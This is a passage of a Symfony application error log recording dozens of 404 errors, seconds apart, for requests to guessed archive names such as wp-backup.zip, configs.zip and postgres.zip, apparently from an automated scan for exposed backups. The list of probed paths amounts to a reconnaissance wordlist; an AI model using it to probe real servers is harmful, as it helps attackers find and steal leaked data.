  3489. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dbase.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dbase.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3490. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /redis.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /redis.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3491. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /back_up.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /back_up.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3492. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /application.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /application.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3493. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3494. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /archive.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /archive.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3495. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3496. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configs.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configs.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3497. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mirror.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mirror.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3498. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-complete.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-complete.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3499. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3500. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /postgres.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /postgres.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3501. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /portal.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /portal.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3502. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_5.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_5.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3503. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /domains.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /domains.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3504. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /microservices.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /microservices.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3505. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /elasticsearch.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /elasticsearch.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3506. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-full.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-full.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3507. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /domain.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /domain.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3508. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /photos.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /photos.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3509. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configuration.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configuration.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3510. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3511. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /temporary.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /temporary.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3512. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /applications.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /applications.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3513. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /json.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /json.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3514. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-2024.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-2024.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3515. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mongodb.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mongodb.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3516. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqllite.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqllite.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3517. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3518. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /restapi.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /restapi.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3519. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /documents.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /documents.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3520. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3521. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3522. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /videos.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /videos.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3523. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /properties.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /properties.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3524. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-20240527.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-20240527.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3525. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /gallery.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /gallery.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3526. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sites.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sites.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3527. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /content.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /content.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3528. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_1.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_1.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3529. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /neo4j.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /neo4j.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3530. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Archive.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Archive.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3531. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /postgresql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /postgresql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
